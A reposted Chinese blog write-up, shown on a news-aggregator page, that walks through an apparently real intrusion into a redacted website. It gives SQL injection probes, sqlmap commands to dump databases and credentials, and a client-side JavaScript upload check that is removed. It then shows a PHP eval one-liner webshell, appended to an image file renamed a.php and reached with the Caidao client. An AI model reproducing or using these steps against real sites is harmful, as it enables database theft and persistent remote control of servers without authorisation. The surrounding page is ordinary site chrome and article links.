服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

记录一次实战,注入+本地JS绕过拿shell

日期: 来源:LemonSec收集编辑:

01 正文

1.找注入点


2.测试是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,没有回显


输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。

3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”


发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。

4.使用御剑扫描后台。然后进行登录。


我们先上传一个脚本木马试试。


发现有黑名单。先看下是否是本地js校验。右键审查元素,发现是本地js校验。


我们找到表单form,删除相对应的脚本。


5.重新上传php一句话,发现

那么试下图片马

6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>

保存,命名为a.php。然后上传,发现上传成功,使用菜刀连接,密码pw。



文章来源:CSDN

原文地址:https://blog.csdn.net/qq_34341458/article/details/113845203

如需转载本样式风格、字体版权请保留出处:李白你好


侵权请私聊公众号删文


 热文推荐  


欢迎关注LemonSec
觉得不错点个“赞”、“在看“

文章推荐

相关阅读

  • 数世咨询:攻击面收敛能力指南

  • 前言  继以色列安全初创公司 Axonius作为一家专门从事网络安全资产管理的安全企业夺得2019年RSAC创新沙盒的冠军后,老生常谈的“网络空间测绘”、“资产管理”等概念重新走

  • 每周安全动态精选(4.24-4.28)

  • 本周精选1、ATT&CK v13 发布,现在提供 ICS 资产重构、分析伪代码、移动数据源2、PaperCut企业打印管理软件存在远程代码执行漏洞3、APT组织“Evasive Panda”劫持热门软件更

  • Github开源工具–抓取浏览器密码

  • 这是一个抓取浏览器密码的工具,用于内网横向渗透相关登录凭证获取,后续会添加更多功能。地址https://github.com/QAX-A-Team/BrowserGhost当前已完成功能演示1. 实现system抓

  • 虎符智库|奇安信专家深度解读RSAC安全趋势

  • 本文5998字 阅读约需 15分钟RSAC 2023 :携手更强大2023 年 RSAC的主题是 “Stronger Together”(携手更强大),显然是从美国知名女作家、教育家、社会活动家海伦·凯勒的名言获

  • GUI界面的信息搜集工具 -- ThunderSearch

  • 一、工具介绍调用ZoomEye的官方api(未来会支持更多资产搜索引擎),开发的GUI界面的信息搜集工具。支持查询主机搜索、域名/IP、web应用搜索、个人信息,支持读取config.json文件

  • ChatGPT生成的代码比你写的更不安全

  • 出品 | OSC开源社区(ID:oschina2013)ChatGPT 是 OpenAI 发布的大语言模型聊天机器人,可以根据用户的输入生成文本,其中包括代码。不过加拿大魁北克大学的研究人员发现,ChatGPT 生

  • CVE-2023-22809:Sudo权限提升漏洞通告

  • 赶紧点击上方话题进行订阅吧!报告编号:CERT-R-2023-70报告来源:360CERT报告作者:360CERT更新日期:2023-03-301 漏洞简述2023年03月30日,360CERT监测发现sudo发布了sudo的风险通告,

  • 安全日报(2023.03.30)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-033099报告来源:360CERT报告作者:360CERT更新日期:2023-03-301 Security Incident|安全事件美国食品药品监督管理局推出维护医疗设

聚合标签

中国 自己的 美国 都是 亿元 的人 疫情 的是 三星 华为 手机 企业 万元 这款 车型 日本 小米 俄罗斯 项目 民警

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

  • 美国对华2000亿关税清单,到底影响有多大?

  • 1 今天A股大跌,上证最大跌幅超过2%。直接导火索是美国证实计划对华2000亿美元产品加征25%关税。 听起来,2000亿美元数目巨大,我们来算笔账。 2000亿美元,按现在人民币汇率

最新文章

  • “我从高职毕业,当了清华老师”

  • 陕西姑娘邢小颖高职毕业后,以专业排名第一的成绩,在清华大学担任实践教学指导老师。今年29岁的她,已在清华任教9年。此前,她的讲课视频在网上播放量过亿。火出圈的她,引来更多关

  • 一些重要的SQLMap命令

  • 前言SQLMap是每个渗透测试师的必备工具。这是众多强大的主流工具之一,尤其是在测试OWASP Top 10中的SQL注入漏洞时。从扫描SQL注入漏洞到获取数据库名字、表和列,以及获得系统

  • 记录一次实战,注入+本地JS绕过拿shell

  • 01 正文1.找注入点2.测试是否有注入:http://xxxxxx/xxxx.php?id=6’ ,没有回显输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。3. 使用sqlm

  • 94年出生的他,斩获“金头盔”!

  • 任立乐1994年出生是歼击机飞行员至高荣誉“金头盔”获得者年轻的“金头盔”飞行员是怎样“炼”成的一起来看↓↓↓中部战区航空兵某旅机场数架战机依次升空红方飞行员任立乐